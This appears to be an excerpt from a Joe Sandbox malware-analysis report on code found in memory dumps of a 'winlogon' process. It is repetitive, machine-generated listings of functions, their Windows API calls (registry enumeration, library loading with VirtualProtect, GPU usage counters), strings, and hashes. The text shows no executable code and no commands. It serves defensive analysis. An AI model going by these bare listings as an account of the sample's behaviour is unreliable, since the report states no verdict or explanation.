Instruction Fuzzy Hash: 70512A32224B84DAE724DF62E44839EBBA1FB89F99F444136DE4E47758EF39C0498700

Function 000001E8589E12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589E1315
GetProcessHeap.KERNEL32 ref: 000001E8589E1323
HeapAlloc.KERNEL32 ref: 000001E8589E1334
RegEnumValueW.ADVAPI32 ref: 000001E8589E1393

Part of subcall function 000001E8589E1530: StrCmpIW.SHLWAPI ref: 000001E8589E1561

GetProcessHeap.KERNEL32 ref: 000001E8589E13DB
HeapAlloc.KERNEL32 ref: 000001E8589E13E9
GetProcessHeap.KERNEL32 ref: 000001E8589E1406
HeapFree.KERNEL32 ref: 000001E8589E1414
lstrlenW.KERNEL32 ref: 000001E8589E141D
GetProcessHeap.KERNEL32 ref: 000001E8589E142B
HeapAlloc.KERNEL32 ref: 000001E8589E1439
StrCpyW.SHLWAPI ref: 000001E8589E145B
GetProcessHeap.KERNEL32 ref: 000001E8589E1472
HeapFree.KERNEL32 ref: 000001E8589E1480

Strings

d, xrefs: 000001E8589E1356

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: ca4b8f56c7a682a2a92569bc2e3bd8a8144b2aa145878565410976a934b2335e
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 95513B72220B84D6E725DF62E44839EBBA1FB88F99F444126DE4D47B58EF38D0558700

Function 000001E8589812B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001E858981315
GetProcessHeap.KERNEL32 ref: 000001E858981323
HeapAlloc.KERNEL32 ref: 000001E858981334
RegEnumValueW.ADVAPI32 ref: 000001E858981393

Part of subcall function 000001E858981530: StrCmpIW.SHLWAPI ref: 000001E858981561

GetProcessHeap.KERNEL32 ref: 000001E8589813DB
HeapAlloc.KERNEL32 ref: 000001E8589813E9
GetProcessHeap.KERNEL32 ref: 000001E858981406
HeapFree.KERNEL32 ref: 000001E858981414
lstrlenW.KERNEL32 ref: 000001E85898141D
GetProcessHeap.KERNEL32 ref: 000001E85898142B
HeapAlloc.KERNEL32 ref: 000001E858981439
StrCpyW.SHLWAPI ref: 000001E85898145B
GetProcessHeap.KERNEL32 ref: 000001E858981472
HeapFree.KERNEL32 ref: 000001E858981480

Strings

d, xrefs: 000001E858981356

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: c984ef08d83f35b1eac2642061c1a48934d806646e156bbb58394d9480ac22c5
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: B6511B32624B84D6E764DF62E45839EB7A2FB88F99F444126DE4E47768EF38C0558B00

Function 000001E8589BEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001E8589BF34A,?,?,00000000,000001E8589BF2CD), ref: 000001E8589BEFF5
GetLastError.KERNEL32(?,?,00000000,000001E8589BF2CD), ref: 000001E8589BF007
LoadLibraryExW.KERNEL32(?,?,00000000,000001E8589BF2CD), ref: 000001E8589BF049
VirtualProtect.KERNEL32 ref: 000001E8589BF0A5
VirtualProtect.KERNEL32 ref: 000001E8589BF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001E8589BF2CD), ref: 000001E8589BF11A
GetProcAddress.KERNEL32(?,?,00000000,000001E8589BF2CD), ref: 000001E8589BF126

Strings

api-ms-, xrefs: 000001E8589BF01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001E8589BF157, 000001E8589BF165
ext-ms-, xrefs: 000001E8589BF02E

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 4963eae51284f2d491dc6253db006444ff50d9d2712e617db342ead855e7e9f9
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 25517931729A84D9EA159B66E8443EDB390BF48BB1F580B369E3E473D0EF38D4458750

Function 000001E8589EEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001E8589EF34A,?,?,00000000,000001E8589EF2CD), ref: 000001E8589EEFF5
GetLastError.KERNEL32(?,?,00000000,000001E8589EF2CD), ref: 000001E8589EF007
LoadLibraryExW.KERNEL32(?,?,00000000,000001E8589EF2CD), ref: 000001E8589EF049
VirtualProtect.KERNEL32 ref: 000001E8589EF0A5
VirtualProtect.KERNEL32 ref: 000001E8589EF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001E8589EF2CD), ref: 000001E8589EF11A
GetProcAddress.KERNEL32(?,?,00000000,000001E8589EF2CD), ref: 000001E8589EF126

Strings

api-ms-, xrefs: 000001E8589EF01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001E8589EF157, 000001E8589EF165
ext-ms-, xrefs: 000001E8589EF02E

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 99d19baf59b3ad7721b439de8d72dcaaa497e8b356a8dce58398d0db58e19fcb
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 86518D31721BC8D2EA299B56E8403EDB690AF48BB0F5807379E7E477D4EF38D4658640

Function 000001E8589EA22C Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001E8589EA289

Part of subcall function 000001E8589EB144: __GetUnwindTryBlock.LIBCMT ref: 000001E8589EB187
Part of subcall function 000001E8589EB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001E8589EB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001E8589EA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001E8589EA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001E8589EA6BC

Strings

!-M, xrefs: 000001E8589EA245
csm, xrefs: 000001E8589EA384
csm, xrefs: 000001E8589EA30A
csm, xrefs: 000001E8589EA2A3

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm$ !-M
API String ID: 849930591-3980662079
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 807cf59a37a189ea4db05904c9d3395bc5805ea2866621a6502f863b2ee37095
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: DDD14972624780CBEB209F65D4413DDBBA0FB69B98F101126EE8D57BAADF34C5A1C701

Function 000001E8589B33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001E8589B33FD
GetProcessHeap.KERNEL32 ref: 000001E8589B3412
HeapAlloc.KERNEL32 ref: 000001E8589B3420
PdhGetCounterInfoW.PDH ref: 000001E8589B3436
StrCmpW.SHLWAPI ref: 000001E8589B344B

Part of subcall function 000001E8589B3950: StrCmpNW.SHLWAPI ref: 000001E8589B3972
Part of subcall function 000001E8589B3950: StrStrW.SHLWAPI ref: 000001E8589B3990
Part of subcall function 000001E8589B3950: StrToIntW.SHLWAPI ref: 000001E8589B39B7

GetProcessHeap.KERNEL32 ref: 000001E8589B3488
HeapFree.KERNEL32 ref: 000001E8589B3496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001E8589B3444

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 6f277c073b86dc51bff5f7495ef6c7f35d57c6e260500943fc71c261ceb447f2
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 5A318032624A80DBE721DF12E80879EF7A1FB88BD6F4546369E4D43A25DF38D4568740

Function 000001E8589E33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001E8589E33FD
GetProcessHeap.KERNEL32 ref: 000001E8589E3412
HeapAlloc.KERNEL32 ref: 000001E8589E3420
PdhGetCounterInfoW.PDH ref: 000001E8589E3436
StrCmpW.SHLWAPI ref: 000001E8589E344B

Part of subcall function 000001E8589E3950: StrCmpNW.SHLWAPI ref: 000001E8589E3972
Part of subcall function 000001E8589E3950: StrStrW.SHLWAPI ref: 000001E8589E3990
Part of subcall function 000001E8589E3950: StrToIntW.SHLWAPI ref: 000001E8589E39B7

GetProcessHeap.KERNEL32 ref: 000001E8589E3488
HeapFree.KERNEL32 ref: 000001E8589E3496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001E8589E3444

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: cc9d9051079bcbc7772d4670f2c98b3b137ba7ab74e4a9fb74fc75109180be81
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 9231A032620A81E7E726DF12E8447DDF7A0FB88BD5F444636AE4D43A64EF38D4668340

Function 000001E8589833A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001E8589833FD
GetProcessHeap.KERNEL32 ref: 000001E858983412
HeapAlloc.KERNEL32 ref: 000001E858983420
PdhGetCounterInfoW.PDH ref: 000001E858983436
StrCmpW.SHLWAPI ref: 000001E85898344B

Part of subcall function 000001E858983950: StrCmpNW.SHLWAPI ref: 000001E858983972
Part of subcall function 000001E858983950: StrStrW.SHLWAPI ref: 000001E858983990
Part of subcall function 000001E858983950: StrToIntW.SHLWAPI ref: 000001E8589839B7

GetProcessHeap.KERNEL32 ref: 000001E858983488
HeapFree.KERNEL32 ref: 000001E858983496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001E858983444

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 680fbe4df5a4e389d42097ec8dfb9375e4b51d1580904d83da28f1f5e114076f
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 90316F32A20A81D6E721DF22E8447DEF3A1FF98BD5F4446369E4D43A64EF38C5568B40

Function 000001E8589B34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001E8589B3516
GetProcessHeap.KERNEL32 ref: 000001E8589B3527
HeapAlloc.KERNEL32 ref: 000001E8589B3535
PdhGetCounterInfoW.PDH ref: 000001E8589B354B
StrCmpW.SHLWAPI ref: 000001E8589B3560

Part of subcall function 000001E8589B3950: StrCmpNW.SHLWAPI ref: 000001E8589B3972
Part of subcall function 000001E8589B3950: StrStrW.SHLWAPI ref: 000001E8589B3990
Part of subcall function 000001E8589B3950: StrToIntW.SHLWAPI ref: 000001E8589B39B7

GetProcessHeap.KERNEL32 ref: 000001E8589B358D
HeapFree.KERNEL32 ref: 000001E8589B359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001E8589B3559

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: a797f8bf0b7667f3798a69baddeaf342a0209f41e3cdb4ad09486f1a35ce906a
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: F7313932624B85CAEB50DF22E88879DF7E1BB84F95F4541369E4E43724EE78C846D700

Function 000001E8589E34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001E8589E3516
GetProcessHeap.KERNEL32 ref: 000001E8589E3527
HeapAlloc.KERNEL32 ref: 000001E8589E3535
PdhGetCounterInfoW.PDH ref: 000001E8589E354B
StrCmpW.SHLWAPI ref: 000001E8589E3560

Part of subcall function 000001E8589E3950: StrCmpNW.SHLWAPI ref: 000001E8589E3972
Part of subcall function 000001E8589E3950: StrStrW.SHLWAPI ref: 000001E8589E3990
Part of subcall function 000001E8589E3950: StrToIntW.SHLWAPI ref: 000001E8589E39B7

GetProcessHeap.KERNEL32 ref: 000001E8589E358D
HeapFree.KERNEL32 ref: 000001E8589E359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001E8589E3559

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 539c5f661ae9f47353c2f51a962f279c6ab86cc189f3481769e8d1f1aec9c66e
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 4D315932720B85DAEB15DF26E88479DB7A0BB84F95F4541369E4E43724EF38D865C600

Function 000001E8589834B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001E858983516
GetProcessHeap.KERNEL32 ref: 000001E858983527
HeapAlloc.KERNEL32 ref: 000001E858983535
PdhGetCounterInfoW.PDH ref: 000001E85898354B
StrCmpW.SHLWAPI ref: 000001E858983560

Part of subcall function 000001E858983950: StrCmpNW.SHLWAPI ref: 000001E858983972
Part of subcall function 000001E858983950: StrStrW.SHLWAPI ref: 000001E858983990
Part of subcall function 000001E858983950: StrToIntW.SHLWAPI ref: 000001E8589839B7

GetProcessHeap.KERNEL32 ref: 000001E85898358D
HeapFree.KERNEL32 ref: 000001E85898359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001E858983559

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 37b044a8039f61fcfb46c8d27b0efef2b9debc9d4a1bf034e39d0f1468016108
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: DC312F31620B86CAE750DF26E844B9EF3A1BF84F95F4441369E4E43724EF38C555DA00

Function 000001E8589BA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001E8589BA289

Part of subcall function 000001E8589BB144: __GetUnwindTryBlock.LIBCMT ref: 000001E8589BB187
Part of subcall function 000001E8589BB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001E8589BB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001E8589BA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001E8589BA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001E8589BA6BC

Strings

csm, xrefs: 000001E8589BA384
csm, xrefs: 000001E8589BA2A3
csm, xrefs: 000001E8589BA30A

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: f9fd6b66e0a824dba5321a1e18a6c37c9628e8675697e92b11fc73f8f655f139
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 40D15772629B80CEEB609B65D4813DDB7E0FB49799F100226EE8D57B9ADF38C581C701

Function 000001E85898A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001E85898A289

Part of subcall function 000001E85898B144: __GetUnwindTryBlock.LIBCMT ref: 000001E85898B187
Part of subcall function 000001E85898B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001E85898B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001E85898A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001E85898A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001E85898A6BC

Strings

csm, xrefs: 000001E85898A30A
csm, xrefs: 000001E85898A2A3
csm, xrefs: 000001E85898A384

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 9bf5cc6a1760f481c943986a686966ab1593a852faf4a865bfee481d6bd55f98
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 1FD15833624B82CAEB609B65D4413DDB7A0FB45798F100126EE8D57B9ADF38C591CB02

Function 000001E85895962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001E858959689

Part of subcall function 000001E85895A544: __GetUnwindTryBlock.LIBCMT ref: 000001E85895A587
Part of subcall function 000001E85895A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001E85895A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001E858959761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001E8589599AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001E858959ABC

Strings

csm, xrefs: 000001E85895970A
